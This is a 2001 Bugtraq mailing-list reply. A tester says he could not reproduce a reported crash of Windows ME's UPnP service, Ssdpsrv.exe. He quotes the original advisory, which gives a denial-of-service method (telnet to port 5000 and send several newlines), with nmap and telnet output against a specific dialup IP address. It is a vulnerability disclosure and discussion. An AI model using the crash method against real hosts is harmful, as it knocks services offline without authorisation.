One of my PCs runs Windows ME so I tried to replicate the crash but to no avail. I can send 3 newline commands then I get the "HTTP/1.1 400 Bad Request" but Ssdpsrv.exe does not crash. I know Microsoft aren't always that great at security but making a program that crashes after 3 new line commands seems a little silly even for them :-) The ME install was a custom install and the service was running so I think there's a definite link there. Rob Mears http://www.securitywriters.org ----- Original Message ----- From: "milo omega" <mtwoar@hotmail.com> To: <bugtraq@securityfocus.com> Sent: Thursday, October 18, 2001 1:46 AM Subject: Ssdpsrv.exe in WindowsME > By connecting to a computer running Ssdpsrv you are able to crash the > Ssdpsrv server. > > Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes. > This service comes standard with the WindowsME installation. > > The Ssdpsrv.exe server is started at boot. > Here is the registry entry: > KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices > Here is the file that starts the server: > c:\windows\system\ssdpsrv.exe > > For information about UPnP go here: > http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP > > Upon running a scan on a computer running the server I get the following: > <snip> > bash-2.05$ nmap -sT 165.121.234.217 > Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ ) > Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217): > (The 1547 ports scanned but not shown below are in state: closed) > Port State Service > 139/tcp open netbios-ssn > 5000/tcp open fics > Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds > </snap> > > Method to crash Ssdpsrv: > Connect to the computer on port 5000. > Send 3 to 5 newline characters. > You then get an error and are disconnected. > <snip> > bash-2.05$ telnet 165.121.234.217 5000 > Trying 165.121.234.217... > Connected to 165.121.234.217. > Escape character is '^]'. > > > > HTTP/1.1 400 Bad Request > > Connection closed by foreign host. > bash-2.05$ > </snap> > > Here is the error caused by the crash: > Ssdpsrv has caused an error in MSVCRT.DLL. > Ssdpsrv will now close. > If you continue to experience problems, > try restarting your computer. > > This causes the server crash and closes port 5000. > Either you must restart the server by manually running ssdpsrv.exe > or reboot. > > shouts to pulltheplug #c. > :o > > _________________________________________________________________ > Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp >
